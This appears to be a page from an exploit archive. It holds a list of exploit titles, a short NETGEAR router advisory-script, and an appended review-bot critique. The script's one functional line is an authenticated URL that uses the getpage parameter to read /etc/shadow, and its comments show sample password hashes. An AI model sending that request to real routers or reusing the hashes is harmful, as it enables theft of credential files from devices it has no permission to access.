
17 new exploits

DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion
DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion
DodosMail 2.0.1 - (dodosmail.php) Remote File Inclusion
DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion
DoSePa 1.0.4 - (textview.php) Information Disclosure
DoSePa 1.0.4 - 'textview.php' Information Disclosure
TrueCrypt 4.3 - Privilege Escalation
TrueCrypt 4.3 - 'setuid' Privilege Escalation
w-Agora 4.2.1 - (cat) SQL Injection
w-Agora 4.2.1 - 'cat' Parameter SQL Injection
IPTBB 0.5.4 - (viewdir id) SQL Injection
IPTBB 0.5.4 - 'id' Parameter SQL Injection
LoudBlog 0.6.1 - (parsedpage) Remote Code Execution
LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution
evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
evilboard 0.1a - SQL Injection / Cross-Site Scripting
QuickTime Player 7.3.1.70 - (rtsp) Buffer Overflow
QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow
DigitalHive 2.0 RC2 - (user_id) SQL Injection
DigitalHive 2.0 RC2 - 'user_id' Parameter SQL Injection
X7 Chat 2.0.5 - 'day' SQL Injection
X7 Chat 2.0.5 - 'day' Parameter SQL Injection
HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit
HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/DoS
Cisco VPN Client - Integer Overflow (DOS)
Cisco VPN Client - Integer Overflow (DoS)
Multiple WordPress Plugins - timthumb.php File Upload
Multiple WordPress Plugins - 'timthumb.php' File Upload
glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation
glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation
NetServe FTP Client 1.0 - Local DOS (Overflow)
NetServe FTP Client 1.0 - Local DoS (Overflow)
Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial Of Service (PoC)
Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084)
Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read
Microsoft Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Microsoft Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read
Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation
Solaris 8/9 ps - Environment Variable Information leak
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow dtprintinfo Privilege Escalation
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow Non-Exec Stack Privilege Escalation
Solaris 8/9 passwd(1) - 'circ()' Stack-Based Buffer Overflow Privilege Escalation
Linux Kernel - TCP Related Read Use-After-Free
WordPress Plugin 'XCloner' 3.1.5 - Multiple Vulnerabilities
WordPress Plugin 404 to 301 2.2.8 - Persistent Cross-Site Scripting
WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting
MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure
D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure
NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure
NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure
PLANET ADSL Router AND-4101 - Remote File Disclosure
Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)
Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution
38 lines
1.4 KiB
Bash
Executable file
#!/bin/sh
#
# NETGEAR ADSL ROUTER
# Authenticated Remote File Disclosure
#
# Hardware Version: WNR500 / WNR612v3 / JNR1010 / JNR2010
# Firmware Version: 1.0.7.2 / 1.0.0.9 / 1.0.0.32 / 1.0.0.20
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
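Review bot: The only non-comment line in this file is the bare URL after the header block, so with the `#!/bin/sh` shebang and the executable bit set the file is not a working script; a shell would read the URL as a command name and each unquoted `&` as a background operator. Storing it as a plain-text advisory without the executable bit would match what the file actually is. The header lists the affected hardware and firmware versions but says nothing about the root cause (the `getpage` parameter accepting an absolute path such as `/etc/shadow`), a fixed firmware release, or a mitigation, which is what a reader triaging these devices needs. The trailing comment lines also carry full `$1$` password hashes as sample output; a redacted sample would show the disclosed file format without publishing credential material. The `var:language=en_us` parameter is repeated in the URL and one copy can be dropped.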